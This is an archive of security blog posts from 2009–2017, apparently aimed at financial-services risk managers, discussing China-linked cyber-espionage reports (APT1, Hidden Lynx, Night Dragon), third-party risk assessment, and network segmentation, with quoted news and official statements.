Pirated Software and Network Segmentation

July 17, 2017

Global financial services enterprises face a complex web of risk management challenges.
Sometimes finding the right grain for security controls can be a difficult problem.
This can be especially problematic when there is a tendency to attribute specific risks to cultures or nations.

A couple months ago I read a short article on how wannacry ransomware impacted organizations in China. Recently, while responding to a question about data communications connectivity and segmenting enterprise networks, I used some of the factoids in this article. While some propose material “savings” and “agility” enabled by uninhibited workforce communications and sharing, the global financial services marketplace imposes the need for rational/rationalized risk management and some level of due diligence evidence. Paul Mozur provides a brief vignette about some of the risks associated with what seems like China’s dependence on pirated software. Mr. Mozur argues that unlicensed Windows software is not being patched, so the vulnerability ecosystem in China is much richer for attackers than is found in societies where software piracy is less pronounced. Because of the scale of the issue, this seems like it is a valid nation-specific risk — one that might add some context to some individual’s urges to enforce China-specific data communications controls.

Again, there is no perfect approach to identifying security controls at the right grain. Story-telling about risks works best with real and relevant fact-sets. This little article may help flesh out one facet of the risks associated with more-open, rather than more segmented data communications networks.

“China, Addicted to Bootleg Software, Reels From Ransomware Attack.”

FBI Director James Comey on Some China Risks

October 5, 2014

For a variety of reasons, it is often a challenge to generate the appropriate level of information security awareness in executive leadership.
For some this has been especially true when the issues are associated with nation-state actors or a given culture.

For enterprises extending their operations into China, it may be difficult to build an effective risk-management message in the face of the virtually-intoxicating potential for growth and profit.

In that context, a recent interview with FBI Director James Comey included some unambiguous statements that might be helpful in framing some of the risks of integrating or extending your Financial Services operations into China. The interview was aired on the October 5, 2014 episode of 60 Minutes.

Scott Pelley: What countries are attacking the United States as we sit here in cyberspace?

James Comey: Well, I don’t want to give you a complete list. But I can tell you the top of the list is the Chinese. As we have demonstrated with the charges we brought earlier this year against five members of the People’s Liberation Army. They are extremely aggressive and widespread in their efforts to break into American systems to steal information that would benefit their industry.

Scott Pelley: What are they trying to get?

James Comey: Information that’s useful to them so they don’t have to invent. They can copy or steal so learn about how a company might approach negotiation with a Chinese company, all manner of things.

Scott Pelley: How many hits from China do we take in a day?

James Comey: Many, many, many. I mean, there are two kinds of big companies in the United States. There are those who’ve been hacked by the Chinese and those who don’t know they’ve been hacked by the Chinese.

Scott Pelley: The Chinese are that good?

James Comey: Actually, not that good. I liken them a bit to a drunk burglar. They’re kicking in the front door, knocking over the vase, while they’re walking out with your television set. They’re just prolific. Their strategy seems to be: We’ll just be everywhere all the time. And there’s no way they can stop us.

Scott Pelley: How much does that cost the U.S. economy every year?

James Comey: Impossible to count. Billions.

The entire transcript is available at:


Other Completosec Channel blog entries on this topic:

Third-Party Security Assessments – We Need a Better Way

July 6, 2014

“According to a February 2013 Ponemon Institute survey, 65% of organizations transferring consumer data to third-party vendors reported a breach involving the loss or theft of their information. In addition, nearly half of organizations surveyed did not evaluate their partners before sharing sensitive data.” [DarkReading]

Assessing the risks associated with extending Financial Services operations into vendor/partner environments is a challenge.  It often results in less-than-crisp indicators of more or less risk.  Identifying, measuring, and dealing with these risks with a risk-relevant level of objectivity is generally not cheap and often takes time — and sometimes it is just not practical using our traditional approaches.  Some approaches also only attempt to deal with a single point-in-time, which ignores the velocity of business and technical change.

There are a number of talented security assessment companies that offer specialized talent, experience, and localized access virtually world-wide.  The challenge is less about available talent, but of time/delay, expense, and risks that are sometimes associated with revealing your interest in any given target(s).

There are also organizations which attempt to replace a repetitive, labor-intensive process with a non-repetitive, labor-saving approach that may reduce operational expenses and may also support some amount of staff redeployment.  The Financial Services Round Table/BITS has worked toward this goal for over a decade.  Their guidance is invaluable.  For those in the “sharing” club, it appears to work well when used applied to a range established vendor types.  It is also, though, a difficult fit for many situations where the candidate vendor/partners are all relatively new (some still living on venture capital) and are still undergoing rapid evolution.  Some types of niche, cloud-based specialty service providers fall easily into this category.  The incentive to invest in a “BITS compliant” assessment for these types of targets seems small, and any assessment’s lasting value seems equally small.

Some challenges are enhanced by increasing globalization – for example, how do we evaluate the risks associated with a candidate vendor that has technical and infrastructure administrative support personnel spread across Brazil, Costa Rica, U.S East & West coasts, Viet Nam, China, India, Georgia, Germany, and Ireland?  Culture still matters.  What a hassle…

None of that alters the fact that as global financial services organizations we have obligations to many of our stakeholders to effectively manage the risks associated with extending our operations into vendor’s environments and building business partnerships.

When the stakes are material – for example during merger or acquisition research – it is easy to understand the importance of investing in an understanding of existing and candidate third-party risks.  There are many other situations where it seems “easy” to understand that a third party security assessment is mandated.  Unfortunately, not all use cases seem so universally clear-cut.

When we are attempting to evaluate platform or vendor opportunities, especially when in the early stages of doing so, the time and expense associated with traditional approaches to full-bore third-party risk assessments are a mismatch.  Performing third-party risk assessments in-house can also reveal sensitive tactical or strategic planning which can negatively impact existing relationships, add unnecessary complexity to negotiations, or, in edge cases, even disrupt relationships with key regulators.  As an industry, we have got to get better at quick-turn-around third-party risk assessments that are “good-enough” for many types of financial services decision-making.

For years, “technicians” have been evaluating Internet-facing infrastructure for signals of effective technology-centric risk management practices – or for their absence.  Poorly configured or vulnerable email or DNS infrastructure, open SNMP services, “external” exposure of “internal” administrative interfaces, SSL configurations, public announcements of breaches, and more have been used by many in their attempts to read “signals” of stronger or weaker risk management practices.  A colleague just introduced me to a company that uses “externally-observable” data to infer how diligent a target organization is in mitigating technology-associated risks.  Based on a quick scan of their site, they tell a good story.*  I am interested in learning about anyone’s experience with this, or this type of service.

*I have no relationships with BitsightTech, financial or otherwise.



“BitSight Technologies Launches Information Security Risk Rating Service.” 9/10/2013

“Bits Framework For Managing Technology Risk For Service Provider Relationships.” November 2003 Revised In Part February 2010.

Shared Assessments.

The company a colleague mentioned to me…

Infrastructure and Integration, Culture Matters

December 17, 2013

A recent 60 Minutes episode highlighted an NSA staffer describing a Chinese plot to “take down” the U.S. financial system using social engineering & a firmware update to brick the computers that support all economic activity.  The story received a lot of unflattering attention (Google it).  The broader piece about recent NSA data-gathering and spying also seemed less like news than an advertisement.  This has resulted in a lot of attention on the nature of the story and the likelihood that there is material distance between the themes highlighted by the CBS report and the behaviors of NSA staff and leadership.  So, why should we care?

There are many reasons.  One assumes that many in our industry receive “news” via feeds & tweets — which must radically distill stories down to a very few words.  Many senior decision-makers “grew up” with news shows like 60 Minutes and have sensors tuned to content from its brand.  So, that channel can deliver messages to financial services leaders in ways many others can’t.

Later in the December 15th 60 Minutes broadcast was a report about the Chinese telecommunications equipment giant “Huawei.”  It could have been a useful reminder that infrastructure matters in global Financial Services risk management.  Global data communications networking makes decision-making about ‘inside’ & ‘outside’ and what or whom to trust much more complex and challenging.  Culture matters.  Nation-state behaviors matter.  The scale and scope of Financial Services operations make it an attractive target for intellectual property theft.  We all need to continue to enhance our understanding of threats associated with infrastructure purchasing and integration, as well as with extending our operations using partners and massive shared ‘cloud’ infrastructure.


“Update on Huawei.” Dec. 15, 2013 http://www.cbsnews.com/videos/update-on-huawei/

“Chinese telecom giant eyed as security threat.” Oct. 05, 2012, http://www.cbsnews.com/news/chinese-telecom-giant-eyed-as-security-threat/


Symantec Report Highlights Hidden Lynx Threat to Financial Services Enterprises

September 25, 2013

Last week researchers at security vendor Symantec released a whitepaper attempting to describe the nature and activities of a group of advanced, professional attackers working out of China, dubbed the Hidden Lynx team.

They report that Hidden Lynx offers a ‘hackers for hire’ operation that has stayed busy the last four years stealing specific information from a wide range of corporate targets.  Symantec says that Hidden Lynx activities display skill-sets far above some other attack groups also operating out of China — for example the Comment Crew (aka APT1) — and adds that they are “breaking into some of the best-protected organizations in the world.”

Hidden Lynx has targeted hundreds of organizations worldwide since November 2011.  Financial services organizations (not commercial banks) have been the vertical targeted most often by this group, amounting to almost 25% of the top 10 targeted industries.  In that same period, they also hit targets in United States almost 53% of the time.

Symantec’s analysis suggests that Hidden Lynx is “tasked with obtaining very specific information that could be used to gain competitive advantages… It is unlikely that this organization engages in processing or using the stolen information for direct financial gain.”

When Symantec looked at Hidden Lynx’s large scale attacks, the focus on Financial Services increased, amounting to 30% of their attacks.

The key conclusion offered by Symantec is that “cyber-espionage campaigns are becoming increasingly common,” and that “these attacks are becoming increasingly sophisticated.”

We can take steps to help resist attacks like those by Hidden Lynx keeping valuable information from falling into their hands. The key is to take those steps! Work with your information security consultants.  Protect all endpoints, yours included, from malware.  Use ‘safe’ web filtering services. Train your workforce to resist social engineering through all communications channels, including your browser.  Incorporate secure software practices into all of your business application investments.  Insist on secure infrastructure configurations and practices.


“Hidden Lynx – Professional Hackers for Hire.”
By Stephen Doherty, Jozsef Gegeny, Branko Spasojevic, and Jonell Baltazar.
Version 1.0 – Sept 17, 2013

“Hidden Lynx – Professional Hackers for Hire.”
17 Sept 2013

“Hidden Lynx and MSS protection.”
18 Sept 2013

China Cyber-Threat Again Highlighted

February 19, 2013

Responding to the buzz generated by the release of a new evidence-rich report on  China’s cyber threat actors by Mandiant, a pair of articles today point out again China-sourced cyber-threats to businesses.  Financial services is a global enterprise.  Virtually all financial services organizations are attempting to enter China markets and are pursuing investments in China in order to better diversify their portfolios and offer their customers opportunities in throughout Asia.

The report by Mandiant and signals from the U.S. government remind us again that it is important to resist the types of attacks that seem to continue out of China.  Mandiant documented that the China-based hostile actors have systematically stolen hundreds of terabytes of data from at least 141 organizations.  The White House specifically highlighted that this threat was directed against Financial Services organizations, among others.

Writers at The Washington Post said that the recent “Mandiant report echoed a classified National Intelligence Estimate by the U.S. intelligence community that concluded that China was the most aggressive perpetrator of a massive campaign of cyber-espionage against commercial targets in the United States.”

Writers in the Wall Street Journal added that:

“U.S. officials said the allegations in the Mandiant report come as no surprise and build on other evidence of cyber infiltration.

A 2011 intelligence report publicly accused China of a role in cyberattacks. More recently, a U.S. assessment known as a National Intelligence Estimate, which remains classified and hasn’t been released, cited the Chinese government as being behind pervasive cyberthefts resulting in the loss of intellectual property, according to people who have read it.”

Bringing value to China appears to come at a material risk.  Can you afford to lose your risk models?  Your fraud analysis engines? Your portfolio management tooling?  Your investing strategies?  We all have material investments in highly-portable intellectual property.  Protect it from known threats as a demonstration of threshold due diligence.

At a minimum, ensure that you have employed a full spectrum of threat-resisting technology and process that is already hand in every financial services organization. Ensure that your protective layers overlap and compensate for each other, and do so throughout your infrastructure, not just at the Internet edge. Plan for and fund enhancement of your detective, preventative, corrective, and compensating control capabilities — as the issue of persistent “world-class” state-sponsored hostile actors appears to be with us for the forseeable future.


“Mandiant Intelligence Center Report — APT1: Exposing One of China’s Cyber Espionage Units.”

“Report ties cyberattacks on U.S. computers to Chinese military.”
By William Wan and Ellen Nakashima; 02-19-2013

“U.S., China Ties Tested in Cyberspace.”
By JULIAN E. BARNES and SIOBHAN GORMAN in Washington and JEREMY PAGE in Beijing; 02-19-2013

Updated to include the following reference on 04-15-2013:
“contextChina’s Guide to Understanding Recent News on Chinese Hackers.”
By  , 02-22-2013

Risks Are High For Extending Financial Services into China

February 18, 2012

The economic trajectory of 1.3 billion Chinese has Western financial services leadership giddy.  They project oceans of profits generated through services to China’s growing middle class and wealthy elites.  Shareholders read about our corporation’s efforts to plumb critical hubs of their global operations into Chinese joint ventures, and seem to support leader’s optimism.  In the rush for earnings, systems are rapidly being integrated across virtually all lines of personal and corporate finance.

In many situations, this vision seems out of phase with guidance from seasoned financial services security and risk management professionals.  All material players in global financial services distinguish their organizations from the competition through their market reach and human capital.  Some also tout the value of their brand or their access to non-human capital.  But a key differentiator remains proprietary business rules, investments analysis and operations platforms, and data.  These foundational assets exist in highly-portable digital form and cannot be replaced or easily re-factored if they are stolen.  It is already difficult and expensive to resist targeted cyber-attacks, many of which emanate from China.  Casually extending financial services infrastructure into China is an elevated risk gamble — of a magnitude rarely undertaken even by the most aggressive of our peers.  Plan to lose some of these bets as core intellectual property and data are appropriated into our Chinese competitor’s operations.

This should not be new news…

After years of reticence to engage the issue, it seems like the U.S. government is now changing course and attempting to help engage U.S. businesses in efforts to more effectively address some of the risks associated with Chinese cyber-threats.  Last fall House Intelligence Chairman Mike Rogers (R-MI) accused China of widespread cyber economic espionage.  Chairman Rogers said, “China’s economic espionage has reached an intolerable level…”

Late last month three individuals in positions to have extensive, long-running access to secret intelligence concerning cyber-threats against United States targets released an opinion column in the Wall Street Journal titled: “China’s Cyber Thievery Is National Policy—And Must Be Challenged.”  The piece was written by Mike McConnell (Director of the National Security Agency 1992-1996, and Director of National Intelligence 2007-2009), Michael Chertoff (Secretary of Homeland Security from 2005-2009), and William Lynn (Deputy Secretary of Defense 2009-2011).  Their central message was that “The Chinese government has a national policy of economic espionage in cyberspace. In fact, the Chinese are the world’s most active and persistent practitioners of cyber espionage today.”

Reporting on the topic, NPR’s Tom Gjelten quoted Mike McConnell: “We know, and there’s good evidence … of very deliberate, focused cyber espionage to capture very valuable research and development information, or innovative ideas, or source code or business plans for their own advantage.”  Writing about the WSJ column on the topic, Gelton went on to write that “One reason they were anxious to publicize China’s cyber espionage was to counter those who claimed there was little concrete evidence to link the Chinese definitively to major hacking activity.”

Attackers from China have been conducting sustained, coordinated, covert intellectual property and sensitive financial information thefts against corporations, in some cases for years.  There are powerful forces influencing the dialog on this topic.  With few exceptions, representatives of companies doing business in China seem to have a pattern of stumbling whenever asked to discuss this topic in public.  As leaders in global financial services organizations intensify their focus on extracting value from Chinese markets, we need to ensure that sufficient fact-based risk management influence is applied to technology, infrastructure, operations, and information security decision-making.

“US lawmaker: China cyber espionage ‘intolerable.'”
October 4, 2011, Susan Cornwell, Reuters.

“China’s Cyber Thievery Is National Policy—And Must Be Challenged.”
January 27th, 2012, Wall Street Journal.

“U.S. Not Afraid To Say It: China’s The Cyber Bad Guy.”
February 18, by Tom Gjelten, National Public Radio

“Night Dragon” — The New ‘More of the Same’?

February 27, 2011

“Night Dragon” — The New ‘More of the Same’?

A Wall Street Journal story reported earlier this month that attackers from China have been conducting sustained, coordinated, covert intellectual property and sensitive financial information thefts against energy corporations, in some cases for years.  They relayed that these “cyberattacks successfully took gigabytes of highly sensitive internal documents.”

The WSJ piece includes a “cyber warfare” spin on this activity.  Exploring Google Trends, and informal monitoring of the security and technical press suggests that hyping issues with references to “Cyber warfare” or “Cyber war” has been on the rise in some channels.  There seem to be many motivations for that hype.  In financial services, it is more productive to focus on the specific families of Internet-enabled criminal activity that are targeting global business (financial services, in my case), than to link communications about that activity with the broader, multi-purpose, “cyber warfare” moniker.

McAfee named these attacks “Night Dragon” in a recently-published report.

McAfee announced that they have “identified a string of attacks designed to steal sensitive data from targeted organizations” by perpetrators that “appear to be sophisticated, highly organized, and motivated in their pursuits.”  McAfee emphasized that these were not opportunists, preying on some shared industry weakness…  They say that the attacks could have been running for the last four years, but started no later than November 2009 and that individual company losses were in the many millions of dollars. (pages 3 & 7)

In that report they argued that these attacks were part of a broader trend where “adversaries are rapidly leveraging productized malware toolkits that let them develop more malware than in all prior years combined, and they have matured from the prior decade to release the most insidious and persistent cyberthreats ever known.” (page 3)

McAfee outlined the stages of “Night Dragon” attacks as:

  • Compromised extranet webservers via SQL injection and remote command execution, as well as targeted spear-phishing.
  • Uploaded hacker tools to these more “trusted” servers to attack each company’s intranet, desktops, and servers.
  • Gained access to sensitive non-public information from internal desktops and servers.
  • Accessed additional usernames and passwords to broaden their access to sensitive information.
  • Used compromised perimeter web servers as command and control platforms for the company-internal desktops and servers.  They later enabled direct communication from infected internal machines to external comand and control infrastructure on the Internet.
  • Used remote administration tools to explore other internal hosts, targeting executives.
  • Exfiltrated gigabytes of email archives and other sensitive documents from executive’s compromised computers.
    (page 4)

McAfee points out that in global corporations, the attacker’s hunt for internal points of “weakness” is also global.  In this case, “Night Dragon” attackers persisted until finding a critical mass of their targeted information.  Proprietary and highly confidential information was stolen from individuals and executives in Kazakhstan, Taiwan, Greece, as well as the United States. (page 4)

McAfee concludes that “While Night Dragon attacks focused specifically on the energy sector, the tools and techniques of this kind can be highly successful when targeting any industry.”  Those of us in financial services should not assume that these attackers only care about oil…

The report is a good read, and if you have not had the opportunity to review it, you should.

The report also spurred some interesting follow-on reporting:

McAfee said that the Night-Dragon attackers stole proprietary information from the networks of Exxon Mobil Corp., Royal Dutch Shell Plc and BP Plc.  Michael Riley wrote for Bloomberg that sources told him Marathon Oil, ConocoPhillips and Baker Hughes were successfully targeted as well.  He highlighted opinions supporting the notion that the Chinese government is involved in this activity as part of their efforts to support a “massive economic leap forward.”  He went on to argue that “The thefts might trigger legal liability for companies that chose not to disclose them to investors.”  In the United States, investors expect that “material” corporate facts will be disclosed in a timely manner.  They also expect that corporations will implement adequate technology and procedures to protect their “crown jewels.”

Phil Muncaster outlined the McAfee report for V3, restating that “The attacks used methodical but far from sophisticated hacking techniques, including SQL injection, password hacking and remote access Trojans.”  He advised that “Companies suspecting that they may have been targeted are urged to look through anti-virus and network traffic logs” — the McAfee report offers some assistance concerning what to look for.  Unless your infrastructure is designed to retain, maybe even normalize, these logs, a multi-year historical investigation of host and network activity might not be a practical matter…

Fraser Howard of SophosLabs, highlighted that the McAfee report “emphasizes the persistent and coordinated attacks of organized groups against specific organizations, with the goal of extracting sensitive data.”  He argues that risk management professional, as well as all corporate leaders need to understand that “Night Dragon” was not special, rather that it is only an illustration of the Internet-enabled criminal menace that all organizations face today.

Fraser Howard’s argument about the new normal might be the most important message we can take from the McAfee report.  What do you think?

– References –

“Oil Firms Hit by Hackers From China, Report Says.” By Nathan Hodge & Adam Entous, 02-10-2011

“Global Energy Cyberattacks: ‘Night Dragon'” By McAfee® Foundstone® Professional Services and McAfee Labs™, February 10, 2011.
http://www.mcafee.com/us/resources/white-papers/wp-global-energy-cyberattacks-night-dragon.pdf And “Night Dragon.” http://www.mcafee.com/mx/about/night-dragon.aspx

“Exxon, Shell, BP Said to Have Been Hacked Through Chinese Internet Servers.” By Michael Riley – Feb 24, 2011

“Hackers Breach Tech Systems of Oil Companies.” By John Markoff, 02-10-2011.

“Night Dragon hackers targeted Shell, BP and Exxon — IT security at global petrochemical firms called into question.” By Phil Muncaster, 02-24-2011

“Night Dragon attacks: myth or reality?” by Fraser Howard, 02-11-2011

“Schwartz On Security: Unraveling Night Dragon Attacks.” By Mathew J. Schwartz, 02-17-2011.

Google Trends.
According to a Google Trends search performed on Feb 27, 2011, material amounts of searches for “cyber warfare” began mid-2009.  There had been a small amount of noise in the news starting in 2001.  Pakistan generated more than twice the number of searches for “cyber warfare” than any of Singapore, India, or the United States, the next three highest, in that order.  That said, Washington, DC, USA, is the city that has generated the largest number of searches for “cyber warfare.”
Google searches and news references to “cyber war” follow a curve similar to that of “cyber warfare,” except that Pakistan no longer leads in searches, Singapore taking over that spot.

“Cyberwarfare Called Fifth Domain of Battle by Pentagon.” By Paul Wagenseil, Feb 16, 2011

Chinese Cyberspying and Intellectual Property Theft

October 23, 2009
New “Cyber Warfare” Report Includes Information on Chinese Cyberspying and Intellectual Property Theft.

Siobhan Gorman of the Wall Street Journal put the recently released “US-China Economic and Security Review Commission Report” in context for corporate organizations.
Attacks like that cited in the report hew closely to a blueprint frequently used by Chinese cyberspies, who in total steal $40 billion to $50 billion in intellectual property from U.S. organizations each year, according to U.S. intelligence agency estimates provided by a person familiar with them.”

Modern-day espionage doesn’t involve cloak and dagger anymore,” said Tom Kellermann, a vice president at Core Security Technologies, a cybersecurity company. “It’s all electronic.”.

China is among more than 100 countries that have the capability to conduct cyberspying operations.
He went on to highlight an an incident in 2007 where Chinese:
…”cyberspies did extensive reconnaissance, identifying which employee computer accounts they wanted to hijack and which files they wanted to steal. They obtained credentials for dozens of employee accounts, which they accessed nearly 150 times.
The cyberspies then reached into the company’s networks using the same type of program help-desk administrators use to remotely access computers.
The 88-page report is not directly aimed at financial services security professionals, but it provides what appears to be credible information about Chinese cyber-attack capabilities and activities.  It points out that China is not alone in its efforts to build and exercise cyber-attack capabilities — this is not only a “China” issue.  The findings in this report, though, should be considered as we continue updating our risk management plans, especially as we host more of our business in China or in partnership with Chinese operations.
From the report:
“The PLA is reaching out across a wide swath of Chinese civilian sector to meet the intensive personnel requirements necessary to support its burgeoning IW capabilities, incorporating people with specialized skills from commercial industry, academia, and possibly select elements of China’s hacker community.”
“China is likely using its maturing computer network exploitation capability to support intelligence collection against the US Government and industry by conducting a long term, sophisticated, computer network exploitation campaign. The problem is characterized by disciplined, standardized operations, sophisticated techniques, access to high-end software development resources, a deep knowledge of the targeted networks, and an ability to sustain activities inside targeted networks, sometimes over a period of months.”
There is “increasing evidence that the intruders are turning to Chinese “black hat” programmers (i.e. individuals who support illegal hacking activities) for customized tools that exploit vulnerabilities in software that vendors have not yet discovered.”
It is an interesting read.  How can we get a read on Chinese culture as it pertains to our risk management analysis?  How will this figure into your risk management planning as your corporation expands its operations into China?  How will this figure into your risk management planning as Chinese businesses expand their operations into your market or even your corporation?
“China Expands Cyberspying in U.S., Report Says.” By Siobhan Gorman, Wall Street Journal, OCTOBER 23, 2009  http://online.wsj.com/article/SB125616872684400273.html.
“US-China Economic and Security Review Commission Report on the Capability of the People’s Republic of China to Conduct Cyber Warfare and Computer Network Exploitation.” By Principal Author Bryan Krekel, and Subject Matter Experts George Bakos and Christopher Barnett.  October 9, 2009  http://china.usc.edu/App_Images//us-china-cyberwar-report-2009.pdf or
Announcement by the USC US-China Institute:  http://china.usc.edu/(A(ayGc7PuyygEkAAAAMGJiMjY0M2QtY2NmYi00ODlkLWEyZTctMzEzMDUzOGQ5MWZm-MWsGZGDymlexh-7e8Rwxq6s3401)S(bof1mn2ijuzcks3tmakvrx45))/ShowArticle.aspx?articleID=1862.

Social Networks are a Global Malicious Code Channel

March 4, 2009

If you are not familiar with the user-base in the social networking sites identified in my last post, you might think that all of them retain a North American focus, and then that this might be a North American problem.  It isn’t.  For example, two recent reports by Finjan identify analogous problems on the livedoor.jp and yaplog.jp social networking sites.  Both systems were infected via malicious iFrames and ActiveX applications designed to take advantage of a range of Windows vulnerabilities and then compromise the local environment and download additional malicious code, including a trojan that steals the user’s credentials.

The Finjan team does a good job outlining their position concerning a key risk of Web2.0 — that is “giving users the power to add code also gives them the power to add malicious code.”  Finjan promotes real-time content inspection.  That approach may buy time, but comprehensive and effective input validation and output encoding still seem like the only approach that will ultimately be successful.

How does your organization approach this issue?

— References —
“Cyber Sino-Japanese War?” MCRC Blog, Feb 26, 2009 http://www.finjan.com/MCRCblog.aspx?EntryId=2197
“Malware and the rising sun website” MCRC Blog, Feb 24, 2009 http://www.finjan.com/MCRCblog.aspx?EntryId=2195

%d bloggers like this: